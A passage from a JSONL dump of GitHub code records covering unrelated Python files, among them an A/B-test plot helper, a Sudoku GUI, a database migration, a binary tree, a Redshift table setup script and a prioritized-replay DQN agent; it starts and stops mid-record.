summarize and plot.\n\n Returns:\n None. The function only produces a plot and prints a summary.\n \"\"\"\n mu = df['dbeta'][i].mean()\n sigma = df['dbeta'][i].std()\n\n x_axis = np.linspace(mu - 3 * sigma, mu + 3 * sigma, 100)\n y_axis = df['dbeta'][i].pdf(x_axis)\n\n plt.title(df['metric'][i])\n plt.xlabel('p_B - p_A')\n plt.ylabel('Probability density')\n plt.plot(x_axis, y_axis, color='blue')\n plt.fill_between(x_axis, y_axis, color='blue', alpha=.1)\n plt.axvline(x=0, color='red', linestyle='--')\n plt.show()\n\n p_A = df['p_A'][i]\n p_B = df['p_B'][i]\n Dpp = (p_B - p_A) * 100\n prob_B_higher = df['prob_B_higher'][i]\n\n print('Variant A performed p_A = ' + '{:.2%}'.format(p_A)\n + ' while p_B = ' + '{:.2%}'.format(p_B) + '.')\n if df['p_B'][i] > df['p_A'][i]:\n print('p_B is +' + '{:.2}'.format(Dpp) + 'pp higher than p_A.')\n print('You can be ' + '{:.0%}'.format(prob_B_higher)\n + ' confident that this is a result of the changes you made and not a result of random chance.')\n elif df['p_B'][i] < df['p_A'][i]:\n print('p_B is -' + '{:.2}'.format(-Dpp) + 'pp lower than p_A.')\n print('You can be ' + '{:.0%}'.format(1 - prob_B_higher)\n + ' confident that this is a result of the changes you made and not a result of random chance.')\n else:\n print('There is no statistical difference between variants A and B.')\n","repo_name":"slmf1995/ab_testing","sub_path":"bb_helpers.py","file_name":"bb_helpers.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5818115115","text":"if __name__ == '__main__':\n\n records = []\n\n for _ in range(int(input())):\n name = input()\n score = float(input())\n records.append([name, score])\n\n second_highest_points = sorted(set(points for _,points in records))[1]\n\n for failure in sorted([name for name, points in records if points == second_highest_points]):\n print(failure)\n ","repo_name":"PhilippKorth/hackerrank_solutions","sub_path":"basic_data_types/nested_lists.py","file_name":"nested_lists.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70078322247","text":"import logging\nfrom enum import StrEnum\nfrom tkinter import Button, LabelFrame, Tk\n\nfrom sudoku.view import SudokuBoard\n\nlogger = logging.getLogger(__name__)\n\n\nclass Actions(StrEnum):\n NEW_GAME = \"New Game\"\n SOLVE = \"Solve\"\n HINT = \"Hint\"\n\n\nclass SudokuApp(Tk):\n def __init__(self):\n super().__init__()\n self.title(\"Sudoku\")\n\n logger.info(\"Creating Frames\")\n\n self.board = SudokuBoard()\n self.actions = LabelFrame(text=\"Actions\")\n\n # Creating Actions Buttons\n self.buttons = []\n for i, action in enumerate(Actions):\n self.buttons.append(\n Button(\n self.actions,\n text=action,\n padx=10,\n pady=5,\n command=lambda x=action: self.button_action(x),\n )\n )\n self.buttons[i].grid(row=1, column=i, padx=38, pady=10)\n\n self.actions.grid(row=1, column=1, padx=50, pady=10)\n\n # Generate Board and GUI\n self.board.generate()\n\n def button_action(self, action: Actions):\n if action == Actions.NEW_GAME:\n self.board.generate(None, 17)\n\n elif action == Actions.SOLVE:\n self.board.solve()\n\n elif action == Actions.HINT:\n self.board.hint()\n\n else:\n pass\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=\"INFO\")\n\n app = SudokuApp()\n app.mainloop()\n","repo_name":"JohN100x1/Commit-Sudoku","sub_path":"src/sudoku/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16897143730","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n from calculator_1 import add, sub, mul, div\n import sys\n\n args = sys.argv\n if len(args) != 4:\n print(\"Usage: ./100-my_calculator.py \")\n exit(1)\n if args[2] not in \"+-*/\":\n print(\"Unknown operator. Available operators: +, -, * and /\")\n exit(1)\n\n a = int(args[1])\n b = int(args[3])\n op = args[2]\n if op == \"+\":\n res = add(a, b)\n elif op == \"-\":\n res = sub(a, b)\n elif op == \"/\":\n res = div(a, b)\n else:\n res = mul(a, b)\n\n print(\"{} {} {} = {}\".format(a, op, b, res))\n","repo_name":"Nzioki-G/alx-higher_level_programming","sub_path":"0x02-python-import_modules/100-my_calculator.py","file_name":"100-my_calculator.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31284178239","text":"from random import randint\n\"\"\"1. Crie um algoritmo que defina um vetor de elementos inteiros de tamanho 7, insira\nvalores aleatórios neste vetor e calcule a soma dos elementos que ocupam as posições\npares do vetor seguida pelo valor da soma dos elementos que ocupam as suas posições\nímpares. Imprima o resultado no console.\nEx.: [2,0,1,5,9,7,6]\nResposta: 18-12\"\"\"\n\nVetor = []\n\nPar = 0\nImpar = 0\nfor i in range(0, 7):\n Random = randint(1, 100)\n while Random in Vetor:\n Random = randint(1, 100)\n if Random not in Vetor:\n break\n Vetor.append(Random)\n if Vetor.index(Vetor[i]) % 2 == 0:\n Par += Vetor[i]\n else:\n Impar += Vetor[i]\n\nprint(\"Vetor:\", Vetor)\nprint(\"Par:\", Par)\nprint(\"Impar:\", Impar)\n","repo_name":"RodneyAssis/Estudos-Python","sub_path":"Python/Unit - Programação/3º Periodo/Laboratorio de analise de algoritmo/Aula 1/Revisão 1.py","file_name":"Revisão 1.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36269409886","text":"\"\"\"empty message\n\nRevision ID: 6dc3f2e63558\nRevises: 8ebeb4c2e02f\nCreate Date: 2020-02-03 19:44:19.149282\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"6dc3f2e63558\"\ndown_revision = \"8ebeb4c2e02f\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n conn = op.get_bind()\n # Remove meaningless permissions - a permission not granted to any user is not useful.\n conn.execute(\"DELETE FROM permissions WHERE granted_to_user is NULL\")\n op.alter_column(\n \"permissions\", \"granted_to_user\", existing_type=sa.INTEGER(), nullable=False\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column(\n \"permissions\", \"granted_to_user\", existing_type=sa.INTEGER(), nullable=True\n )\n # ### end Alembic commands ###\n","repo_name":"CIMAC-CIDC/cidc-api-gae","sub_path":"migrations/versions/6dc3f2e63558_.py","file_name":"6dc3f2e63558_.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"41069887043","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n\n\n\npd.set_option(\"display.max_columns\", 30)\n\n# read data to dataframe\ndf = pd.read_excel('pyly_2.xlsx', sheet_name='Worksheet')\n\n# add columns - hour, day of the week, month\ndf['Godzina'] = df['Czas mierzenia'].apply(lambda x: int(datetime.datetime.strptime(x, '%m/%d/%Y %H:%M').time().hour))\ndf['Dzień tygodnia'] = df['Czas mierzenia'].apply(lambda x: int(datetime.datetime.strptime(x, '%m/%d/%Y %H:%M').date().weekday()))\ndf['Miesiąc'] = df['Czas mierzenia'].apply(lambda x: int(datetime.datetime.strptime(x, '%m/%d/%Y %H:%M').date().month))\ndf['Czas mierzenia'] = df['Czas mierzenia'].apply(lambda x: datetime.datetime.strptime(x, '%m/%d/%Y %H:%M'))\n\n# prediction time offset\ngodziny_prognozy = 12\n\n\n# creating prediction column\ndf['PM10_P'] = df['PM10'].shift(periods=-godziny_prognozy)\ndf = df.dropna(subset=['PM10_P'])\n\n\n# identify feature columns and target\nX = df[['PM1', 'PM25', 'PM10', 'Temperatura', 'Ciśnienie', 'Prędkość wiatru', 'Wind bearing', 'Godzina', 'Dzień tygodnia', 'Miesiąc']]\ny = df['PM10_P']\n\nX = X.iloc[3:]\nX = X.reset_index(drop=True)\ny = y[3:]\n\n\n\n\n\n#Średnia Krocząca\n\ndef movingavg(values, window):\n weights = np.repeat(1.0,window)/window\n smas = np.convolve(values,weights,'valid')\n return smas\n\n\nsk = y\nkrok = 72\n\npor_sk = y[krok-1:]\n\npred_sk = movingavg(sk,krok)\n\nmse = sum(abs(pred_sk - por_sk))/len(por_sk)\n\nprint(mse)\n\nczas_x =df['Czas mierzenia'][krok-1+3:]\n\n\n\n\nplt.figure(figsize=(10, 10))\nplt.plot(czas_x[-100:].values,por_sk[-100:], label = 'real')\nplt.plot(czas_x[-100:].values,pred_sk[-100:], label = 'pred')\nplt.xticks(rotation = 40)\nplt.legend()\nplt.show()\n\n\n","repo_name":"infoshareacademy/jdsz2-rundoom","sub_path":"projekt_ml/Rafał/pm_10_r.py","file_name":"pm_10_r.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31510891437","text":"from __init__ import *\n\nimport sys\nimport subprocess\nimport numpy as np\nfrom fractions import Fraction\n\nsys.path.insert(0, ROOT)\n\nfrom compiler import *\nfrom constructs import *\n\ndef nlmeans(pipe_data):\n\t# Params\n\tR = Parameter(Int, \"R\") # image rows\n\tC = Parameter(Int, \"C\") # image cols\n\tpatch_size = Parameter(Int, \"patch_size\")\n\tsearch_area = Parameter(Int, \"search_area\")\n\n\tsigma = 0.12\n\n\tpipe_data['R'] = R\n\tpipe_data['C'] = C\n\n\t# Vars\n\tx = Variable(Int, \"x\")\n\ty = Variable(Int, \"y\")\n\tz = Variable(Int, \"z\")\n\tc = Variable(Int, \"c\")\n\n\t# Input Image\n\timg = Image(Float, \"img\", [3, R, C])\n\n\t# clamped image - boundary conditions: repeat edge\n\trows = Interval(Int, 0, R-1)\n\tcols = Interval(Int, 0, C-1)\n\tcolours = Interval(Int, 0, 3)\n\ts_dom_x = Interval(Int, -search_area/2, search_area + 1)\n\ts_dom_y = Interval(Int, -search_area/2, search_area + 1)\n\n\t#clamped = Function(([c, x, y],[colours, rows, cols]), Float, \"clamped\")\n\t#xminR = Min(x, R-1)\n\t#xclamp = Max(xminR, 0)\n\t#yminC = Min(y, C-1)\n\t#yclamp = Max(0, yminC)\n\t#clamped.defn = [ img(c,) ]\n\t#clamped = img(c, xclamp, yclamp)\n\n\tdef clamped(k, i, j):\n\t\txminR = Min(i, R-1)\n\t\txclamp = Max(xminR, 0)\n\t\tyminC = Min(j, C-1)\n\t\tyclamp = Max(yminC, 0)\n\t\treturn img(k, xclamp, yclamp)\n\n\tinv_sigma_sq = -1.0/(sigma*sigma*patch_size*patch_size)\n\n\t# Halide: Define the difference Images (Func dc)\n\tdx = Variable(Int, \"dx\")\n\tdy = Variable(Int, \"dy\")\n\t\n\t## Body case\n\t#case_dc = Condition(x, \">=\", 1) & \\\n\t\t\t#Condition(x + dx, \">=\", 1) & \\\n\t\t\t#Condition(x, \"<=\", R) & \\\n\t\t\t#Condition(x + dx, \"<=\", R) & \\\n\t\t\t#Condition(y, \">=\", 1) & \\\n\t\t\t#Condition(y+dy, \">=\", 1) & \\\n\t\t\t#Condition(y, \"<=\", C) & \\\n\t\t\t#Condition(y+dy, \"<=\", C)\n\n\tdc = Function(([c, x, y, dx, dy], [colours, rows, cols, s_dom_x, s_dom_y]), Float, \"dc\")\n\tdc.defn = [ Powf((clamped(c,x,y) - clamped(c,x+dx,y+dy)),2) ]\n\n\t# Halide: Sum across colour channels (Func d)\n#\tchannels = Interval(Int, 0, 3)\n#\tchannels_red = Reduction(([c, x, y, dx, dy], [colours, rows, cols, s_dom_x, s_dom_y]), \\\n#\t\t\t([c], [channels]), \\\n#\t\t\tFloat, \\\n#\t\t\t\"channels\")\n#\td_sum = Reduce(channels_red(c, x, y, dx, dy), \\\n#\t\t\tdc(c, x, y, dx, dy), \\\n#\t\t\tOp.Sum)\n\t#d = Function(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), Float, \"d\")\n\t#d.defn = [ d_sum ]\n\t#d = Reduction(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), \n\t\t#\t([c], [colours]), \n\td = Reduction(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), \n\t\t\t([x, y, dx, dy, c], [rows, cols, s_dom_x, s_dom_y, colours]), \n\t\t\tFloat, \n\t\t\t\"d\")\n\td.defn = [ Reduce(d(x, y, dx, dy), dc(c, x, y, dx, dy), Op.Sum) ]\n\td.default = float(0)\n\n\t# Halide: Find the patch differences by blurring the difference image\n\t# Function blur_d\n\tpatch_var = Variable(Int, \"patch_var\")\n\tpatch_interval = Interval(Int, -patch_size/2, patch_size + 1)\n\ty_patch_int = Interval(Int, patch_size/2, C - patch_size - 2)\n\tx_patch_int = Interval(Int, patch_size/2, R - patch_size - 2)\n\tblur_d_y = Reduction(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), \\\n\t\t\t([x, y, dx, dy, patch_var], [rows, y_patch_int, s_dom_x, s_dom_y, patch_interval]), \\\n\t\t\tFloat, \\\n\t\t\t\"blur_d_y\")\n\tblur_d_y.defn = [ Reduce(blur_d_y(x, y, dx, dy), \\\n\t\t\td(x, y + patch_var, dx, dy), \\\n\t\t\tOp.Sum) ]\n\tblur_d_y.default = float(0)\n\t#blur_d_y = Function(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), Float, \"blur_d_y\")\n\t#blur_d_y.defn = [ blur_d_y_sum ]\n\n\t#blur_d_sum = Reduce(patch_dom(x, y, dx, dy), \\\n\t\t\t#\t\tblur_d_y(x + patch_var, y, dx, dy), \\\n\t\t\t#Op.Sum)\n\t#blur_d = Function(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]) , Float, \"blur_d\")\n\t#blur_d.defn = [ blur_d_sum ]\n\tblur_d = Reduction(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), \\\n\t\t\t([x, y, dx, dy, patch_var], [x_patch_int, cols, s_dom_x, s_dom_y, patch_interval]), \\\n\t\t\tFloat, \\\n\t\t\t\"blur_d\")\n\tblur_d.defn = [ Reduce(blur_d(x, y, dx, dy), \\\n\t\t\tblur_d_y(x+ patch_var, y, dx, dy), \\\n\t\t\tOp.Sum) ]\n\tblur_d.default = float(0)\n\n\t# Halide: Compute the weights from the patch differences.\n\tw = Function(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), \\\n\t\t\tFloat, \\\n\t\t\t\"w\")\n\tw.defn = [ Exp(blur_d(x, y, dx, dy) * inv_sigma_sq) ]\n\t#w.defn = Cast(Float, blur_d(x, y, dx, dy) * inv_sigma_sq)\n\n\t# Halide: Add an alpha channel. Func clamped_with_alpha\n\t#cond_alpha = Condition(x, \">=\", 1) & Condition(x, \"<=\", R) & \\\n\t\t\t#\t\tCondition(y, \">=\", 1) & Condition(y, \"<=\", C) & \\\n\t\t\t#Condition(c, \">=\", 0) & Condition(c, \"<=\", 2)\n\t#ca = Variable(Int, \"ca\")\n\tcond_alpha = Condition(c, \">=\", 0) & Condition(c, \"<=\", 2)\n\n\tclamped_with_alpha = Function(([c, x, y], [colours, rows, cols]), \\\n\t\t\tFloat, \\\n\t\t\t\"clamped_with_alpha\")\n\tclamped_with_alpha.defn = [Select(cond_alpha, clamped(c, x, y), 1.0)]\n\n\t# Halide: Define a reduction domain for the search area.\n\tx_search_int = Interval(Int, search_area/2, R - search_area -2)\n\ty_search_int = Interval(Int, search_area/2, C - search_area -2)\n\tnon_local_means_sum = Reduction(([c, x, y], [colours, rows,cols]), \\\n\t\t\t([c, x, y, dx, dy], [colours, x_search_int, y_search_int, s_dom_x, s_dom_y]), \\\n\t\t\tFloat,\n\t\t\t\"non_local_means_sum\")\n\t# Halide: Compute the sum of the pixels in the search area.\n\t# Func non_local_means_sum\n\tnon_local_means_sum.defn = [ Reduce(non_local_means_sum(c, x, y), \\\n\t\t\tw(x, y, dx, dy) * clamped_with_alpha(c, x + dx, y + dy), \\\n\t\t\tOp.Sum) ]\n\tnon_local_means_sum.default = float(0)\n\t#non_local_means_sum = Function(([c, x, y], [colours, rows, cols]), Float, \"non_local_means_sum\")\n\t#non_local_means_sum.defn = [ s_dom_red ]\n\n\t# Final function: non_local_means\n\tc_int = Interval(Int, 0, 2)\n\tnlm_sum = non_local_means_sum(c, x, y) / non_local_means_sum(3, x, y)\n\t#condf = Condition(nlm_sum, \">=\", 0.0) & Condition(nlm_sum, \"<=\", 1.0)\n\tnon_local_means = Function(([c, x, y], [c_int, rows, cols]), Float, \"non_local_means\")\n\t#non_local_means.defn = [ Select(condf, nlm_sum, 0.0) ]\n\tnlm_min = Min(nlm_sum, 1.0)\n\tnlm_clamp = Max(nlm_min, 0.0)\n\tnon_local_means.defn = [ nlm_clamp ]\n\n\treturn non_local_means\n\n","repo_name":"bollu/polymage","sub_path":"sandbox/apps/python/img_proc/non_local_means/polymage_nlmeans.py","file_name":"polymage_nlmeans.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"12285838037","text":"import csv\nimport math\n\n\ndef sign(n: int) -> int:\n \"\"\"And the sign said \"Long-haired freaky people need not apply\".\"\"\"\n if n > 0:\n return 1\n elif n < 0:\n return -1\n else:\n return 0\n\n\ndef move_head(cur_pos: tuple, dir: str, dis: int) -> tuple:\n \"What is love? Baby don't hurt me, don't hurt me, no more.\"\n x, y = cur_pos\n if dir == \"U\":\n y += dis\n if dir == \"D\":\n y -= dis\n if dir == \"R\":\n x += dis\n if dir == \"L\":\n x -= dis\n return (x, y)\n\n\ndef move_tail(cur_pos: tuple, head_pos: tuple) -> tuple:\n \"\"\"I like to move it, move it. You like to... MOVE IT.\"\"\"\n dis = math.dist(head_pos, cur_pos)\n if dis < 2:\n return cur_pos\n else:\n pos_dif = tuple([x[0] - x[1] for x in zip(head_pos, cur_pos)])\n dif_x = 1 * sign(pos_dif[0])\n dif_y = 1 * sign(pos_dif[1])\n new_pos = tuple([sum(x) for x in zip(cur_pos, (dif_x, dif_y))])\n return new_pos\n\n\ndef book_keeper(records: dict, new_pos: tuple) -> dict:\n \"\"\"The silence is golden. To books I am beholden. I know I'm bad, cuz of the knowledge that I'm holdin!\"\"\"\n if new_pos in records:\n records[new_pos] += 1\n else:\n records[new_pos] = 0\n return records\n\n\nif __name__ == \"__main__\":\n head_pos = (0, 0)\n # tail_pos = (0,0)\n head_visits = {(0, 0): 1}\n # tail_visits = {(0,0): 1}\n other_pos = [(0, 0) for _ in range(9)]\n other_visits = [{(0, 0): 1} for _ in range(9)]\n\n with open(\"input.csv\", \"r\") as f:\n reader = csv.reader(f)\n for row in reader:\n for i in range(int(row[1])):\n head_pos = move_head(head_pos, row[0], 1)\n head_visits = book_keeper(head_visits, head_pos)\n # tail_pos = move_tail(tail_pos, head_pos)\n # tail_visits = book_keeper(tail_visits, tail_pos)\n for i in range(9):\n relative_head = head_pos if i == 0 else other_pos[i - 1]\n other_pos[i] = move_tail(other_pos[i], relative_head)\n other_visits[i] = book_keeper(other_visits[i], other_pos[i])\n\n # part 1\n # print(len(tail_visits))\n print(len(other_visits[0]))\n\n # part 2\n print(len(other_visits[8]))\n","repo_name":"Chippers255/aoc_2022","sub_path":"day_9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41802949893","text":"# -*- coding:utf-8 -*-\nclass Node(object):\n \"\"\"节点\"\"\"\n def __init__(self,item):\n self.elem = item\n self.lchild = None\n self.rchild = None\n\n\nclass Tree(object):\n \"\"\"二叉树\"\"\"\n def __init__(self):\n self.root = None\n\n def add(self, item):\n node = Node(item)\n if self.root is None:\n self.root = node\n return\n queue = [self.root] # 第一次时:queue = [None]\n while queue:#此时第一次会进入while循环,因为是对列表判断是否为空,而不是元素是不是None 即In [2]: bool([None])为True\n cur_node = queue.pop(0)\n if cur_node.lchild is None:\n cur_node.lchild = node\n return\n else:\n queue.append(cur_node.lchild)\n if cur_node.rchild is None:\n cur_node.rchild = node\n return\n else:\n queue.append(cur_node.rchild)\n\n def breadth_travel(self):\n \"\"\"广度遍历(层次遍历)\"\"\"\n if self.root is None:\n return\n queue = [self.root]\n while queue:\n cur_node = queue.pop(0)\n print(cur_node.elem, end=\" \")#end = \" \"代表不换行\n if cur_node.lchild is not None:\n queue.append(cur_node.lchild)\n if cur_node.rchild is not None:\n queue.append(cur_node.rchild)\n\n def preorder(self, node): #node代表根节点\n \"\"\"递归实现先序遍历\"\"\"\n if node is None: #等同于 if node == None\n return\n print(node.elem, end=\" \")\n self.preorder(node.lchild)\n self.preorder(node.rchild)\n\n def inorder(self, node):\n \"\"\"递归实现中序遍历\"\"\"\n if node is None: #代表递归的终结\n return\n self.inorder(node.lchild)\n print(node.elem, end=\" \")\n self.inorder(node.rchild)\n\n def postorder(self, node):\n \"\"\"递归实现后序遍历\"\"\"\n if node is None:\n return\n self.postorder(node.lchild)\n self.postorder(node.rchild)\n print(node.elem, end=\" \")\n\n\nif __name__ == \"__main__\":\n tree = Tree()\n tree.add(0)\n tree.add(1)\n tree.add(2)\n tree.add(3)\n tree.add(4)\n tree.add(5)\n tree.add(6)\n tree.add(7)\n tree.add(8)\n tree.add(9)\n print(\"广度遍历:\", end=\"\")\n tree.breadth_travel()\n print(\" \")\n print(\"先序遍历:\", end=\"\")\n tree.preorder(tree.root)\n print(\" \")\n print(\"中序遍历:\", end=\"\")\n tree.inorder(tree.root)\n print(\" \")\n print(\"后序遍历:\", end=\"\")\n tree.postorder(tree.root)","repo_name":"taogangshow/python_Code","sub_path":"第3章 数据结构与算法/数据库结构与算法/16_binary_tree.py","file_name":"16_binary_tree.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17193549448","text":"import configparser\nimport psycopg2\nfrom sql_queries import create_table_queries, drop_table_queries\n\n\ndef drop_tables(cur, conn):\n ''' Drops tables based on sql_queries.py.'''\n for query in drop_table_queries:\n cur.execute(query)\n conn.commit()\n\n\ndef create_tables(cur, conn):\n '''\n Create tables based on sql_queries.py. sql_queries.py defines 5 tables and \n specifies all columns for each of these with the right data types and conditions.\n '''\n for query in create_table_queries:\n cur.execute(query)\n conn.commit()\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n \n drop_tables(cur, conn)\n create_tables(cur, conn)\n \n conn.close()\n\nif __name__ == \"__main__\": main()","repo_name":"mekarim/redshift_datawarehouse_udacity_tutorial","sub_path":"create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24229136852","text":"# -*- coding: utf-8 -*\nfrom flyai.framework import FlyAI\n\nimport os, sys\nfastbert_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../../\"))\nsys.path.append(fastbert_dir)\nimport torch\nfrom fastbert import FastBERT\nfrom getDataSet import editDFLine, getModelData\n\nmodel_saving_path = \"./data/output/model/best.bin\"\n\nclass Prediction(FlyAI):\n def load_model(self):\n '''\n 模型初始化,必须在此方法中加载模型\n '''\n\n self.dfTrainLabelList, self.dfTrainSList, self.dfVaLabelList, self.dfVaSList, self.labels, self.Label2Char= getModelData(EXMode=1)\n\n self.model = FastBERT(\n kernel_name=\"uer_bert_tiny_zh\",\n labels=self.labels,\n device=\"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n )\n\n self.model.load_model(model_saving_path)\n pass\n\n def predict(self, title, text):\n '''\n 模型预测返回结果\n :param input: 评估传入样例 {\"title\":\"文本\",\"text\":\"文本\"}\n :return: 模型预测成功之后返回给系统样例 {\"label\":\"文本\"}\n '''\n\n labelNum, exec_layer= self.model(title+text)\n\n labelText =self.Label2Char[labelNum]\n\n return {\"label\": labelText}\n\n\n\n\n\nif __name__ == '__main__':\n predict1 = Prediction()\n predict1.load_model()\n label = predict1.predict(\"肩膀脖子后背酸痛是怎么回事?\",\"我的工作主要是在电脑前,以前也有肩膀不舒服的感觉\")\n print(\"label:\",label)\n","repo_name":"TangYuan96/fastbert_MedicalClass_FlyAI","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29590535317","text":"my_list = [1, 2, 3]\r\n\r\n# in python anonymous funcs are defined by expression lambda\r\nprint(list(map(lambda x: x * 2, my_list)))\r\n\r\nfor items in map(lambda x: x * 2, my_list):\r\n print(items)\r\n\r\n\r\n# normal function\r\ndef my_func(num):\r\n if num % 2 == 0:\r\n return num\r\n else:\r\n return 'odd'\r\n\r\n\r\nmy_list = [2, 3, 6]\r\n# lambda expression of function with map\r\nprint(list(map(lambda num: num if num % 2 == 0 else 'odd', my_list)))\r\nprint(list(filter(lambda num: num if num % 2 == 0 else 'odd', my_list)))\r\n","repo_name":"theByteCoder/CorePython","sub_path":"lambdaFuncAndMap.py","file_name":"lambdaFuncAndMap.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8522834606","text":"import re\n\nclass NaiveFunctionParser:\n \"\"\"Naive function definition parser.\"\"\"\n\n TYPE_RE_PROG = re.compile(\n r'[a-zA-Z_][a-zA-Z0-9_:]*$')\n FUNCTION_RE_PROG = re.compile(\n r'(?:[a-zA-Z_][a-zA-Z0-9_:]*)\\s+([a-zA-Z_][a-zA-Z0-9_:]*)\\s*\\(.*\\)\\s*{')\n \"\"\"Regular expression that matches function definitions.\"\"\"\n\n KEYWORDS = set(['catch',\n 'if',\n 'for',\n 'switch',\n 'while'])\n \"\"\"White-listed C++ keywords that are definitely not function names.\"\"\"\n\n def __init__(self):\n self.current_function = None\n \"\"\"Current function name, or None.\"\"\"\n self.previous_line = None\n \"\"\"Previous line from a multi-line function declaration. e.g.:\n\n int\n myfunction\n (args)\n {\n ...\n }\n \"\"\"\n self.nesting = 0\n \"\"\"Nesting depth of braces.\"\"\"\n\n def parse_line(self, line):\n \"\"\"Parse function declarations in a source line.\n Multi-line declarations are supported so long as the follow the template:\n\n int\n myfunction\n (args)\n {\n\n Args:\n line (str): The line to parse.\n\n Returns:\n str: Current function name.\n \"\"\"\n ret = None\n line = line.strip()\n if line.startswith('(') and self.previous_line:\n # function name is on previous line.\n function_line = self.previous_line + line\n elif line.startswith(')') and self.previous_line:\n # close of argument list\n function_line = self.previous_line + line\n elif line == '{' and self.previous_line:\n # opening brace is on its own line\n function_line = self.previous_line + line\n elif self.previous_line and (self.previous_line.endswith('(') or self.previous_line.endswith(',')):\n # multi line arguments\n function_line = self.previous_line + line\n elif self.previous_line and NaiveFunctionParser.TYPE_RE_PROG.search(self.previous_line):\n # multi line return type\n function_line = self.previous_line + ' ' + line\n else:\n function_line = line\n if len(function_line) < 1000: # length check to prevent running regexp on over-long lines\n match = NaiveFunctionParser.FUNCTION_RE_PROG.search(function_line)\n else:\n match = None\n if match and not match.group(1) in NaiveFunctionParser.KEYWORDS:\n ret = self.current_function = match.group(1)\n self.nesting = 1\n self.previous_line = None\n elif line.lstrip().startswith('{') or line.rstrip().endswith('{'):\n self.nesting += 1\n if line.lstrip().startswith('}') or line.rstrip().endswith('}'):\n self.nesting -= 1\n if self.nesting <= 0:\n self.nesting = 0\n self.current_function = None\n self.previous_line = function_line\n return ret\n","repo_name":"aws/porting-advisor-for-graviton","sub_path":"src/advisor/parsers/naive_function_parser.py","file_name":"naive_function_parser.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"16"} +{"seq_id":"41021824908","text":"import numpy as np\nimport random\nfrom collections import namedtuple, deque\n\nfrom model import QNetwork\n\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nBUFFER_SIZE = int(1e5) # replay buffer size\nBATCH_SIZE = 64 # minibatch size\nGAMMA = 0.99 # discount factor\nTAU = 1e-3 # for soft update of target parameters\nLR = 5e-4 # learning rate \nUPDATE_EVERY = 4 # how often to update the network\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nclass PERDDQNAgent():\n '''Prioritzed Experience Replay & Double Q-Learning Agent'''\n\n def __init__(self, state_size, action_size,seed, \n e = 1e-1, alpha = 0.5, beta = 1.0 ):\n '''Initialize an Agent object.\n \n Params\n ======\n state_size (int): dimension of each state\n action_size (int): dimension of each action\n seed (int): random seed\n ''' \n self.alpha = alpha\n self.beta = beta\n self.e = e\n \n self.state_size = state_size\n self.action_size = action_size\n self.seed = random.seed(seed)\n\n # Q-Network\n self.qnetwork_local = QNetwork(state_size, action_size, seed).to(device)\n self.qnetwork_target = QNetwork(state_size, action_size, seed).to(device)\n self.optimizer = optim.Adam(self.qnetwork_local.parameters(), lr=LR)\n\n # Replay memory\n self.memory = ReplayBufferPrioritized(action_size, BUFFER_SIZE, BATCH_SIZE, seed)\n # Initialize time step (for updating every UPDATE_EVERY steps)\n self.t_step = 0\n \n # self.memory.add(state, action, reward, next_state, done)\n # self.memory.update_priorities(indices, priorities)\n \n \n \n \n def step(self, 